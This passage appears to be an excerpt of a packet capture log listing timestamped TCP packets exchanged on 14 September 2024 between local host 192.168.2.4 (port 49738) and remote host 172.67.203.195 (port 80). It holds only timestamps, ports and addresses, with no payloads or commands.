Sep 14, 2024 18:31:09.599699974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599710941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599714041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599744081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599755049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599765062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599807024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599819899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599848032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599858046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599865913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599879980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599889994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599894047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599914074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599948883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.599951029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599966049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599976063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.599986076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600028992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600058079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600065947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600075960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600085020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600094080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600102901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600122929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600152969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600155115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600205898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600205898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600244045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600253105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600291014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600337029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600347042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600357056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600367069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600375891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600394011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600425959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600433111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600477934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600488901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600534916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600541115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600552082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600579023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600588083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600600958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600632906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600712061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600720882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600729942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600739002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600764036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600780010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600790024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600795984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600800991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600811005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600826979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600858927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.600860119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.600912094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.601006985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601016045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601028919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601037979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601042986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601052999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601068974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601130009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.601160049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.601847887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601859093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601875067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601922035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.601948023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.601960897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601970911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601980925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.601993084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602003098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602011919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602016926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602034092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602046013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602056026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602066994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602077007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.602078915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.602122068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.602145910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.641879082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.641887903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.641895056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642072916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642083883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642139912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642151117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642160892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.642179966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.642222881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.642261028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.683686018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683703899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683712006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683765888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683777094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683787107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683795929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.683861971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.683887005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684022903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.684022903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.684243917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684307098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684315920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684370995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684381008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684391022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684418917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.684438944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684451103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.684463978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.684494972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.685524940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685545921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685554981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685609102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685611963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.685621023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685632944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685642958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685651064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685719013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.685750008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.685897112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685933113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685942888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.685992002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686044931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686054945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686064959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686074972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686079979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686084032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686108112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686160088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686158895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686172009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686182022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686196089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686249018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686276913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686289072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686297894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686307907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686319113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686340094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686382055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686389923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686402082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686410904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686419964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686448097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686486006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686492920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686503887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686513901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686523914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686548948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686579943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686585903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686598063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686609030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686620951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686670065 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686695099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686705112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686714888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686724901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686753988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686760902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686772108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686775923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686783075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686817884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686856985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686867952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686876059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686913967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686922073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686933041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686939001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.686944962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686956882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686966896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686975956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.686981916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687016010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687046051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687050104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687119007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687128067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687145948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687155962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687164068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687165976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687186956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687227964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687263012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687275887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687285900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687294006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687321901 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687352896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687366009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687377930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687392950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687419891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687428951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687429905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687441111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687494993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687514067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687597990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687608004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687618971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687628984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687638998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687653065 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687685966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687693119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687707901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687711954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687719107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687731981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687741995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687772989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687803984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687810898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687822104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687833071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687843084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687850952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.687865019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687891960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.687920094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688680887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688692093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688703060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688714027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688724041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688756943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688779116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688790083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688834906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688849926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688852072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688863993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688872099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688896894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688926935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.688936949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688949108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688961029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.688971043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.689003944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.689034939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.728859901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.728873014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.728879929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729049921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729053974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729058981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729063988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729068995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.729324102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.771415949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771440983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771446943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771497965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771502972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771508932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771513939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771629095 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.771641970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771652937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771670103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771680117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771692038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771703005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771713972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.771790981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.771790981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.771790981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.771842957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773017883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773030043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773041964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773082972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773092985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773102999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773113966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773118019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773148060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773180962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773192883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773233891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773299932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773312092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773322105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773330927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773340940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773350954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773354053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773384094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773413897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773425102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773436069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773488998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773513079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773516893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773529053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773539066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773550034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773610115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773700953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773711920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773721933 CEST	80	49738	172.67.203.195	192.168.2.4
